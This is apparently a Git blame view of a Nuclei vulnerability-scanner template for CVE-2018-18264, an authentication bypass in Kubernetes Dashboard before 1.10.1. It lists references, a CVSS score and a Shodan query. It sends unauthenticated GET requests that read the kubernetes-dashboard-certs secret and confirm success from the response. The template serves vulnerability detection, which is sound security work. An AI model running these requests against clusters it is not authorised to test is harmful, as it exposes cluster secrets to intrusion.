nuclei-templates/cves/2018/CVE-2018-18264.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2022-03-03 17:02:39 +00:00
id: CVE-2018-18264
info:
name: Kubernetes Dashboard <1.10.1 - Authentication Bypass
2022-03-03 17:02:39 +00:00
author: edoardottt
severity: high
2022-06-20 16:10:57 +00:00
description: |
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
reference:
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
- https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
2022-03-03 17:02:39 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
2022-03-04 12:18:26 +00:00
metadata:
shodan-query: product:"Kubernetes"
2022-06-20 16:10:57 +00:00
tags: cve,cve2018,kubernetes,k8s,auth-bypass
2022-03-03 17:02:39 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
2022-03-04 12:18:26 +00:00
stop-at-first-match: true
2022-03-03 17:02:39 +00:00
matchers-condition: and
matchers:
2022-03-03 17:05:35 +00:00
2022-03-03 17:02:39 +00:00
- type: dsl
dsl:
- 'contains(body, "apiVersion") && contains(body, "objectRef")'
2022-06-20 16:10:57 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/13